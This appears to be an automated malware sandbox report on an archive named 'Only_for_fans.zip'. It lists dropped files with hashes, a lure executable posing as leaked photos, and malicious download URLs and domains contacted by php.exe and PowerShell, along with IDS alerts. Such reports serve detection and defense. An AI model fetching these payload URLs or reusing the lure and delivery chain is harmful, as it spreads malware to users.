MD5:D02143376CDEA15B313A398A4CAF3735
SHA256:FE5CEEFEDCEC83D40BD63A7CC2D4AE4012B3F59F1098638056FDC1A477D405F7
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\include.phptext
MD5:754B383E06DA268D5687AA7B223C7781
SHA256:EA6172D8EB26C171A54C7E5A345F5AAD492E5F413CB6FDE8F7AF8B661263B91E
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\index.phptext
MD5:32B910646CA44589A49FD98F7C5BC0DF
SHA256:8CBA086C6C336E4788058FFA5BEC7AF4D97244F975874DD948CCCE667E270398
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\Onlyfans Leak (Photos & Videos).exeexecutable
MD5:37932FD952D6D845927F25F42CB3C628
SHA256:CB807472BB6D4D1113FCBC209D6A08FA80FF9E53C83B1AA37F9D6F549AFFD68C
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\WDSync.dllexecutable
MD5:FA29015CB5B0B2A4FDDCE86C5FA90917
SHA256:E9C4F7302BA98DF0A2D2F02ADF298397224988949360E3E9BC9E00A22CA96F6E
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\.DS_Storeds_store
MD5:0419FC542BD3C2A0987D9291E88DA095
SHA256:0861E28776950580BE1821CE8EF29D16A8BBBC530B19795746E479C0C6D46D85
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\php.exeexecutable
MD5:A1FE2FE70B38F91230CB5F4CA22B2C0C
SHA256:702D09E982E2AF6BF5D828BB1D27BD3A48EFCAB7CF8837B023953354C4026550
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\php5.dllexecutable
MD5:0F9246F67611DB06B9082A03E2680ABA
SHA256:36179BE42A85E363099AB57852F6FD1CD12E602E1475841AB169D13FC8955065
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\ext\php_mbstring.dllexecutable
MD5:91E97C0EBBE5A7053B9396B1E376283D
SHA256:6653E52F3A7D12AFC5E1D5922A73D56A9D914864A1F882004E986EA210005B61
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
74
TCP/UDP connections
150
DNS requests
164
Threats
34

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2520
php.exe
GET
200
104.21.1.252:80
http://videox-hamster.top/backup/Canon.exe
unknown
executable
381 Kb
unknown
2556
powershell.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4475c344eafb8bb
unknown
compressed
65.2 Kb
unknown
2520
php.exe
GET
200
104.21.1.252:80
http://videox-hamster.top/backup/CNQMUTIL.dll
unknown
executable
14.5 Kb
unknown
636
php.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8d9505767529154a
unknown
compressed
4.66 Kb
unknown
636
php.exe
GET
200
216.239.32.29:80
http://pki.goog/repo/certs/gts1c3.der
unknown
binary
1.40 Kb
unknown
636
php.exe
GET
200
216.239.32.29:80
http://pki.goog/repo/certs/gtsr1.der
unknown
binary
1.34 Kb
unknown
636
php.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/E1C950E6EF22F84C5645728B922060D7D5A7A3E8.crt?1ca642cfdbc1f31c
unknown
binary
1.34 Kb
unknown
636
php.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
binary
724 b
unknown
636
php.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEA1uFYrLabZxEtE2U5X5DGM%3D
unknown
binary
471 b
unknown
1308
php.exe
GET
200
172.67.153.74:80
http://albumphotography.top/version.txt?ran=1702284888
unknown
text
5 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
svchost.exe
239.255.255.250:1900
whitelisted
324
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
2520
php.exe
104.21.1.252:80
videox-hamster.top
CLOUDFLARENET
unknown
2120
php.exe
188.114.96.3:443
1bilionupdated.top
CLOUDFLARENET
NL
unknown
2556
powershell.exe
64.185.227.156:443
api.ipify.org
WEBNX
US
unknown
2556
powershell.exe
172.67.188.111:443
10minions.top
CLOUDFLARENET
US
unknown
2556
powershell.exe
93.184.221.240:80
ctldl.windowsupdate.com
EDGECAST
GB
whitelisted
636
php.exe
172.67.134.197:443
1bilionupdates.top
CLOUDFLARENET
US
unknown

DNS requests

Domain
IP
Reputation
videox-hamster.top
  • 104.21.1.252
  • 172.67.128.110
malicious
1bilionupdated.top
  • 188.114.96.3
  • 188.114.97.3
  • 188.114.96.9
  • 188.114.97.9
malicious
api.ipify.org
  • 64.185.227.156
  • 104.237.62.212
  • 173.231.16.77
shared
10minions.top
  • 172.67.188.111
  • 104.21.8.109
malicious
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
1bilionupdates.top
  • 172.67.134.197
  • 104.21.6.116
unknown
firebasestorage.googleapis.com
  • 142.250.186.74
  • 142.250.186.106
  • 142.250.181.234
  • 172.217.16.138
  • 142.250.184.202
  • 142.250.184.234
  • 142.250.186.138
  • 142.250.74.202
  • 142.250.186.42
  • 172.217.18.10
  • 172.217.16.202
  • 142.250.186.170
  • 216.58.206.42
  • 172.217.18.106
  • 172.217.23.106
  • 216.58.212.138
whitelisted
pki.goog
  • 216.239.32.29
whitelisted
ocsp.pki.goog
  • 142.250.186.131
whitelisted
albumphotography.top
  • 172.67.153.74
  • 104.21.80.190
malicious

Threats

PID
Process
Class
Message
324
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2520
php.exe
A Network Trojan was detected
ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
2520
php.exe
Potential Corporate Privacy Violation
AV POLICY HTTP request for .exe file with no User-Agent
2520
php.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
324
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2556
powershell.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2520
php.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2520
php.exe
Misc activity
ET HUNTING Possible EXE Download From Suspicious TLD
2520
php.exe
Potential Corporate Privacy Violation
AV POLICY HTTP request for .dll file with no User-Agent
2520
php.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Process
Message
powershell.exe
Native library pre-loader is trying to load native SQLite library "C:\Users\admin\AppData\Roaming\AviraLib\x86\SQLite.Interop.dll"...
worker.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Roaming\imageclass\User directory exists )
avast_64.exe
Native library pre-loader is trying to load native SQLite library "C:\Users\admin\AppData\Roaming\AviraLib\x86\SQLite.Interop.dll"...
chromium_32.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Roaming\imageclass2\User directory exists )
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Only_for_fans.zip